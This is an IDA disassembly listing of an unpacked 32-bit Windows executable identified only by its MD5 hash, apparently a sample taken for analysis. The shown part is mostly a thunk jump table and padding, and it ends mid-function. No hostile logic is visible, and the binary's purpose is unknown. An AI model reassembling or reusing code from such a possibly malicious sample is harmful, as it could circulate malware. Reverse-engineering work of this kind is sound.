;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : F6D67D5D967DECF6BE1DA258E46D4704
; File Name : u:\work\f6d67d5d967decf6be1da258e46d4704_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00026000 ( 155648.)
; Section size in file : 00026000 ( 155648.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401005 proc near ; CODE XREF: sub_4087B3+1F5A�p
; sub_4087B3+20AA�p
jmp sub_40539F
sub_401005 endp
; ---------------------------------------------------------------------------
jmp loc_403CBB
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40100F proc near ; CODE XREF: sub_401896+20�p
; sub_4019A7+8�p ...
jmp sub_4017E7
sub_40100F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401014 proc near ; CODE XREF: sub_402413+1EB�p
; .text:0040343A�p ...
jmp sub_4045C0
sub_401014 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn thunk
sub_401019 proc near ; DATA XREF: sub_407BA3+4AA�o
jmp sub_4049E0
sub_401019 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40101E proc near ; CODE XREF: sub_4087B3:loc_40C7A6�p
jmp sub_4115A6
sub_40101E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401023 proc near ; CODE XREF: .text:00403F64�p
jmp sub_403B34
sub_401023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401028 proc near ; CODE XREF: sub_4087B3+43E4�p
jmp sub_40452A
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40102D proc near ; CODE XREF: sub_4087B3:loc_40A059�p
jmp sub_4109FE
sub_40102D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401032 proc near ; CODE XREF: sub_4085DD+3D�p
; sub_4087B3+1CB�p ...
jmp sub_40E485
sub_401032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401037 proc near ; CODE XREF: sub_4087B3+32EC�p
jmp sub_40448A
sub_401037 endp
; ---------------------------------------------------------------------------
jmp loc_412437
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401041 proc near ; CODE XREF: sub_414190+290�p
jmp sub_4140AD
sub_401041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401046 proc near ; CODE XREF: sub_41264E+49�p
; DATA XREF: .data:off_434AD8�o
jmp sub_41220B
sub_401046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40104B proc near ; DATA XREF: sub_4087B3+28F5�o
; sub_4087B3+2D78�o
jmp loc_404D4D
sub_40104B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401050 proc near ; CODE XREF: sub_402120+1F�p
; sub_402120+16A�p ...
jmp sub_402931
sub_401050 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401055 proc near ; DATA XREF: .text:00411E19�o
jmp loc_411EE7
sub_401055 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40105A proc near ; CODE XREF: sub_4109FE+39�p
jmp sub_410B6B
sub_40105A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40105F proc near ; CODE XREF: sub_403661+F0�p
; sub_403661+20F�p ...
jmp sub_414C1C
sub_40105F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401064 proc near ; CODE XREF: sub_413EFC+3C�p
jmp sub_413B9E
sub_401064 endp
; ---------------------------------------------------------------------------
jmp loc_4122E0
; ---------------------------------------------------------------------------
jmp loc_404AD5
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401073 proc near ; CODE XREF: sub_405779+17�p
; sub_405779+60�p
jmp sub_405673
sub_401073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401078 proc near ; CODE XREF: sub_401A18+E�p
; sub_401A18+33�p ...
jmp sub_4016D1
sub_401078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40107D proc near ; CODE XREF: sub_410626+20�p
; sub_412976+1BB�p ...
jmp sub_41086A
sub_40107D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401082 proc near ; CODE XREF: sub_405673+51�p
; sub_405673+87�p
jmp sub_40545D
sub_401082 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401087 proc near ; CODE XREF: sub_40196F+14�p
; sub_401993+8�p ...
jmp sub_40192E
sub_401087 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40108C proc near ; CODE XREF: .text:00414CD9�p
jmp sub_414D07
sub_40108C endp
; ---------------------------------------------------------------------------
jmp loc_40FE9A
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401096 proc near ; CODE XREF: sub_401F4B+81�p
; sub_401F4B+AB�p
jmp sub_401EF5
sub_401096 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40109B proc near ; CODE XREF: sub_40205B+48�p
; sub_402413+181�p
jmp sub_401F4B
sub_40109B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A0 proc near ; CODE XREF: sub_4087B3+CFF�p
jmp sub_414F49
sub_4010A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A5 proc near ; CODE XREF: sub_4087B3+38AB�p
; sub_414E55+12�p ...
jmp sub_414DA4
sub_4010A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AA proc near ; CODE XREF: sub_405673+17�p
; sub_414190+1F3�p
jmp sub_405512
sub_4010AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AF proc near ; CODE XREF: sub_4087B3+42DE�p
jmp sub_40474C
sub_4010AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B4 proc near ; CODE XREF: sub_402D46+42A�p
jmp sub_402B90
sub_4010B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B9 proc near ; CODE XREF: sub_4152FA+45�p
jmp sub_4153B5
sub_4010B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010BE proc near ; CODE XREF: sub_4137C0+A�p
; sub_4138CE+8�p ...
jmp sub_413798
sub_4010BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010C3 proc near ; CODE XREF: sub_4087B3:loc_409ED1�p
jmp sub_41014B
sub_4010C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn thunk
sub_4010C8 proc near ; DATA XREF: sub_4087B3+26B7�o
jmp sub_4127D1
sub_4010C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010CD proc near ; CODE XREF: sub_40841B+D6�p
jmp sub_411594
sub_4010CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D2 proc near ; CODE XREF: .text:0040342E�p
; sub_4034D1+B2�p ...
jmp sub_40E4DC
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D7 proc near ; CODE XREF: .text:00407A82�p
; sub_4085DD+E9�p
jmp sub_40F9F7
sub_4010D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010DC proc near ; CODE XREF: sub_4087B3+406E�p
jmp sub_40F54D
sub_4010DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E1 proc near ; CODE XREF: sub_4087B3+1749�p
jmp sub_41049A
sub_4010E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E6 proc near ; CODE XREF: sub_4035CD+B�p
; sub_403661+2D�p ...
jmp sub_414EF3
sub_4010E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010EB proc near ; CODE XREF: sub_4087B3+3FC5�p
jmp sub_4035CD
sub_4010EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F0 proc near ; CODE XREF: sub_402413+13E�p
; sub_402B2A+28�p ...
jmp sub_40297C
sub_4010F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F5 proc near ; CODE XREF: sub_4087B3+2B63�p
; sub_4087B3+35C1�p
jmp sub_40FC36
sub_4010F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010FA proc near ; CODE XREF: sub_4019F2+B�p
; sub_401A18+1A1�p ...
jmp sub_401993
sub_4010FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010FF proc near ; CODE XREF: sub_407BA3+5E4�p
; DATA XREF: sub_4087B3+2AE3�o
jmp sub_40841B
sub_4010FF endp
; ---------------------------------------------------------------------------
jmp loc_404688
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401109 proc near ; CODE XREF: .text:00405837�p
; sub_407BA3:loc_408256�p ...
jmp sub_414E55
sub_401109 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40110E proc near ; CODE XREF: sub_4085DD+12A�p
jmp sub_4087B3
sub_40110E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401113 proc near ; CODE XREF: sub_4087B3+492D�p
; sub_415473+6B�p ...
jmp sub_4152FA
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401118 proc near ; CODE XREF: .text:00406AF9�p
jmp sub_406EDE
sub_401118 endp
; ---------------------------------------------------------------------------
jmp loc_4114A3
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401122 proc near ; CODE XREF: .text:004051BF�p
; sub_4087B3+425E�p
jmp sub_40FF61
sub_401122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401127 proc near ; DATA XREF: sub_4087B3+46D7�o
jmp loc_4128FE
sub_401127 endp
; ---------------------------------------------------------------------------
jmp loc_413FEF
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401131 proc near ; CODE XREF: sub_40FACF+25�p
; sub_40FB3F+6B�p
jmp sub_40FB1A
sub_401131 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401136 proc near ; CODE XREF: sub_4087B3+F33�p
jmp sub_40FF37
sub_401136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40113B proc near ; CODE XREF: sub_4087B3+94D�p
; sub_4087B3+97B�p ...
jmp sub_40F942
sub_40113B endp
; ---------------------------------------------------------------------------
jmp loc_4016DD
; ---------------------------------------------------------------------------
jmp loc_407825
; ---------------------------------------------------------------------------
loc_40114A: ; DATA XREF: sub_4087B3+438E�o
jmp loc_4047DA
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40114F proc near ; CODE XREF: sub_412976+245�p
jmp sub_410714
sub_40114F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401154 proc near ; CODE XREF: sub_41014B+20�p
jmp sub_4101F3
sub_401154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401159 proc near ; CODE XREF: sub_401896+5E�p
; sub_401896+6F�p ...
jmp sub_4017C8
sub_401159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40115E proc near ; CODE XREF: sub_40278A+39�p
; sub_40278A+45�p
jmp sub_4029BE
sub_40115E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401163 proc near ; CODE XREF: sub_41264E+5C�p
jmp sub_412583
sub_401163 endp
; ---------------------------------------------------------------------------
jmp loc_4138EA
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40116D proc near ; CODE XREF: sub_40841B+123�p
jmp sub_4085DD
sub_40116D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401172 proc near ; CODE XREF: .text:0041293E�p
; sub_41313F+8�p
jmp sub_412976
sub_401172 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401177 proc near ; CODE XREF: .text:00413933�p
jmp sub_4137C0
sub_401177 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40117C proc near ; CODE XREF: sub_4087B3:loc_409FB8�p
jmp sub_410626
sub_40117C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401181 proc near ; DATA XREF: sub_406B82+246�o
jmp loc_4069A0
sub_401181 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401186 proc near ; CODE XREF: sub_4138CE+E�p
; sub_413993+4A�p
jmp sub_413972
sub_401186 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40118B proc near ; CODE XREF: sub_406B82+17C�p
jmp sub_4077EC
sub_40118B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401190 proc near ; CODE XREF: sub_4019F2+16�p
; sub_401A18+91�p ...
jmp sub_4019A7
sub_401190 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401195 proc near ; DATA XREF: sub_407BA3+522�o
; sub_4087B3+1634�o
jmp loc_40798E
sub_401195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40119A proc near ; CODE XREF: .text:004033AA�p
; .text:004033CC�p
jmp sub_402D46
sub_40119A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40119F proc near ; CODE XREF: sub_402413+167�p
jmp sub_40205B
sub_40119F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011A4 proc near ; CODE XREF: .text:004016F5�p
; sub_401A18+11E�p
jmp sub_401716
sub_4011A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011A9 proc near ; CODE XREF: sub_4087B3+1831�p
jmp sub_410895
sub_4011A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011AE proc near ; CODE XREF: sub_4034D1+74�p
; sub_4087B3+40D8�p ...
jmp sub_413F6C
sub_4011AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011B3 proc near ; DATA XREF: sub_4087B3+355B�o
jmp loc_415046
sub_4011B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011B8 proc near ; CODE XREF: .text:004040E1�p
; DATA XREF: .data:off_42AF2C�o
jmp sub_402413
sub_4011B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011BD proc near ; CODE XREF: sub_405512+12�p
jmp sub_4054B8
sub_4011BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011C2 proc near ; CODE XREF: .text:00405A0A�p
; .text:00407877�p ...
jmp sub_411561
sub_4011C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011C7 proc near ; DATA XREF: sub_4087B3+27B3�o
jmp loc_411CFD
sub_4011C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011CC proc near ; CODE XREF: sub_4087B3+45FE�p
jmp sub_4034D1
sub_4011CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011D1 proc near ; DATA XREF: .text:00412017�o
jmp loc_412147
sub_4011D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011D6 proc near ; DATA XREF: sub_4127D1+7B�o
jmp sub_4126D1
sub_4011D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011DB proc near ; CODE XREF: .text:loc_412945�p
jmp sub_412D63
sub_4011DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011E0 proc near ; CODE XREF: sub_4087B3+2C91�p
jmp sub_412280
sub_4011E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011E5 proc near ; DATA XREF: sub_4087B3+4490�o
jmp loc_414CA1
sub_4011E5 endp
; ---------------------------------------------------------------------------
off_4011EA dd offset byte_4630E9 ; DATA XREF: sub_407BA3+14�o
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011EF proc near ; CODE XREF: .text:00404E6B�p
jmp sub_40537B
sub_4011EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011F4 proc near ; CODE XREF: sub_4087B3+34A5�p
jmp sub_40FD2B
sub_4011F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011F9 proc near ; CODE XREF: sub_404A47+56�p
jmp sub_4049FE
sub_4011F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011FE proc near ; CODE XREF: sub_4087B3+18D2�p
jmp sub_411055
sub_4011FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401203 proc near ; CODE XREF: .text:00406ADB�p
jmp sub_407700
sub_401203 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401208 proc near ; CODE XREF: sub_40288B+79�p
jmp sub_402A3E
sub_401208 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40120D proc near ; CODE XREF: .text:00403D68�p
; sub_413B9E+1C8�p ...
jmp sub_41172A
sub_40120D endp
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401217 proc near ; CODE XREF: sub_405512+66�p
; sub_405512+97�p ...
jmp sub_4053BF
sub_401217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40121C proc near ; CODE XREF: .text:004046F1�p
; .text:004047AC�p ...
jmp sub_40FB3F
sub_40121C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401221 proc near ; CODE XREF: sub_401F4B+A1�p
; sub_401F4B+C2�p ...
jmp sub_401E57
sub_401221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401226 proc near ; CODE XREF: .text:00405AAC�p
; .text:00405AD3�p
jmp sub_405941
sub_401226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40122B proc near ; CODE XREF: sub_40FB3F+33�p
jmp sub_40FACF
sub_40122B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401230 proc near ; CODE XREF: sub_401A18+89�p
; sub_401A18+E3�p ...
jmp sub_401896
sub_401230 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401235 proc near ; CODE XREF: .text:00413940�p
jmp sub_413993
sub_401235 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40123A proc near ; CODE XREF: .text:004041E3�p
jmp sub_403661
sub_40123A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40123F proc near ; CODE XREF: sub_402413+86�p
jmp sub_401A18
sub_40123F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401244 proc near ; CODE XREF: sub_402120+2D�p
jmp sub_4020C1
sub_401244 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425084
loc_401249: ; CODE XREF: sub_425084+3�j
; .text:0042509D�j ...
jmp loc_4026A5
; END OF FUNCTION CHUNK FOR sub_425084
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40124E proc near ; CODE XREF: sub_4087B3+35E9�p
; sub_414DA4+53�p
jmp sub_411C45
sub_40124E endp
; ---------------------------------------------------------------------------
jmp loc_411CED
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401258 proc near ; CODE XREF: sub_402120+17C�p
; sub_4155CD+46�p ...
jmp sub_40278A
sub_401258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40125D proc near ; CODE XREF: sub_4087B3+4278�p
jmp sub_414190
sub_40125D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401262 proc near ; CODE XREF: sub_40FF37+7�p
; sub_411876+5F�p ...
jmp sub_4117F1
sub_401262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401267 proc near ; CODE XREF: .text:00406075�p
jmp sub_4062D3
sub_401267 endp
; ---------------------------------------------------------------------------
off_40126C dd offset byte_48DFE9 ; DATA XREF: sub_403661+226�o
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401271 proc near ; CODE XREF: sub_4109FE+2D�p
jmp sub_410B94
sub_401271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn thunk
sub_401276 proc near ; DATA XREF: sub_407BA3+437�o
jmp sub_41313F
sub_401276 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40127B proc near ; CODE XREF: sub_4087B3+1912�p
jmp sub_4113B6
sub_40127B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401280 proc near ; CODE XREF: sub_4087B3+364B�p
; .text:00411BA4�p ...
jmp sub_411876
sub_401280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401285 proc near ; CODE XREF: sub_4087B3+1680�p
; sub_414F49+1D�p
jmp sub_414E93
sub_401285 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40128A proc near ; CODE XREF: sub_4087B3+3FAA�p
jmp sub_414F19
sub_40128A endp
; ---------------------------------------------------------------------------
jmp loc_4123A5
; ---------------------------------------------------------------------------
jmp loc_403294
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401299 proc near ; CODE XREF: sub_402413+4E�p
; sub_402B90+8B�p ...
jmp sub_4116BB
sub_401299 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40129E proc near ; CODE XREF: sub_4152FA+59�p
jmp sub_415473
sub_40129E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012A3 proc near ; CODE XREF: .text:00404101�p
; .text:004043CC�p ...
jmp sub_414FFA
sub_4012A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012A8 proc near ; CODE XREF: .text:00403FB3�p
; .text:004059B7�p
jmp sub_403BF7
sub_4012A8 endp
; ---------------------------------------------------------------------------
jmp loc_41178A
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012B2 proc near ; CODE XREF: sub_40841B+F7�p
; sub_4087B3:loc_408D60�p ...
jmp sub_404651
sub_4012B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012B7 proc near ; CODE XREF: .text:00404F97�p
jmp sub_404A47
sub_4012B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012BC proc near ; CODE XREF: sub_4109FE+4C�p
jmp sub_410AFB
sub_4012BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012C1 proc near ; CODE XREF: sub_4087B3+4041�p
jmp sub_40FCE2
sub_4012C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012C6 proc near ; CODE XREF: sub_401A18+134�p
jmp sub_4019F2
sub_4012C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012CB proc near ; CODE XREF: sub_402413+14A�p
jmp sub_40232A
sub_4012CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012D0 proc near ; CODE XREF: sub_417ED0+C9�p
jmp sub_407BA3
sub_4012D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012D5 proc near ; DATA XREF: .text:004042CF�o
jmp loc_403EFB
sub_4012D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012DA proc near ; CODE XREF: .text:loc_403F6C�p
jmp sub_403ADA
sub_4012DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012DF proc near ; CODE XREF: .text:00406081�p
jmp sub_40636F
sub_4012DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012E4 proc near ; CODE XREF: sub_4029BE+15�p
jmp sub_402B2A
sub_4012E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012E9 proc near ; DATA XREF: sub_4087B3+29E1�o
jmp loc_413ADB
sub_4012E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012EE proc near ; CODE XREF: sub_4145E8:loc_414AD3�p
; DATA XREF: sub_403661+107�o ...
jmp sub_4145E8
sub_4012EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012F3 proc near ; CODE XREF: sub_407BA3+4B�p
jmp sub_40E59D
sub_4012F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012F8 proc near ; DATA XREF: sub_403661+333�o
; sub_4087B3+3F1F�o
jmp loc_40642F
sub_4012F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012FD proc near ; CODE XREF: sub_4049E0+4�p
; sub_407BA3+358�p ...
jmp sub_404954
sub_4012FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401302 proc near ; CODE XREF: sub_4087B3+33C3�p
; sub_4087B3+42A6�p
jmp sub_4144F1
sub_401302 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401307 proc near ; CODE XREF: sub_402120+131�p
jmp sub_40271E
sub_401307 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40130C proc near ; CODE XREF: sub_402120+110�p
; sub_402120+14B�p
jmp sub_4026AF
sub_40130C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401311 proc near ; CODE XREF: sub_401A18+F0�p
; sub_401A18+15B�p ...
jmp sub_40196F
sub_401311 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401316 proc near ; DATA XREF: sub_4087B3+41E6�o
jmp loc_411B30
sub_401316 endp
; ---------------------------------------------------------------------------
jmp loc_405987
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401320 proc near ; CODE XREF: sub_407BA3+212�p
jmp sub_40FDCD
sub_401320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401325 proc near ; CODE XREF: .text:004067EF�p
jmp sub_406B82
sub_401325 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40132A proc near ; CODE XREF: .text:004138F7�p
jmp sub_4138CE
sub_40132A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40132F proc near ; CODE XREF: sub_410626+6D�p
; sub_412D63+18A�p ...
jmp sub_410794
sub_40132F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401334 proc near ; CODE XREF: sub_40232A+24�p
jmp sub_402120
sub_401334 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401339 proc near ; CODE XREF: .text:00413B17�p
jmp sub_413EFC
sub_401339 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40133E proc near ; CODE XREF: .text:00405BB3�p
jmp sub_411CB1
sub_40133E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401343 proc near ; CODE XREF: .text:00407A9B�p
; sub_40841B+7F�p ...
jmp sub_41264E
sub_401343 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401348 proc near ; CODE XREF: sub_402120+3D�p
; sub_4026AF+28�p ...
jmp sub_40288B
sub_401348 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40134D proc near ; CODE XREF: sub_4087B3+408B�p
jmp sub_405779
sub_40134D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401352 proc near ; CODE XREF: sub_401896+18�p
; sub_40192E+16�p ...
jmp sub_40175E
sub_401352 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn thunk
sub_401357 proc near ; DATA XREF: sub_407BA3+3CA�o
jmp sub_411C89
sub_401357 endp
; ---------------------------------------------------------------------------
jmp loc_413164
; ---------------------------------------------------------------------------
jmp loc_40479C
; ---------------------------------------------------------------------------
loc_401366: ; DATA XREF: sub_4087B3+23D1�o
; sub_4087B3+3C0D�o
jmp loc_404194
; ---------------------------------------------------------------------------
db 12Ah dup(0CCh)
byte_401495 db 23Ch dup(0CCh) ; DATA XREF: .data:off_42A91C�o
; =============== S U B R O U T I N E =======================================
sub_4016D1 proc near ; CODE XREF: sub_401078�j
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_4016D1 endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4016DD: ; CODE XREF: .text:00401140�j
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push dword ptr [ebp+8]
call sub_4158E0
pop ecx
push eax
lea ecx, [ebp-8]
push dword ptr [ebp+8]
call sub_4011A4
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
mov eax, esi
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
db 0Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_401716 proc near ; CODE XREF: sub_4011A4�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_415CF8
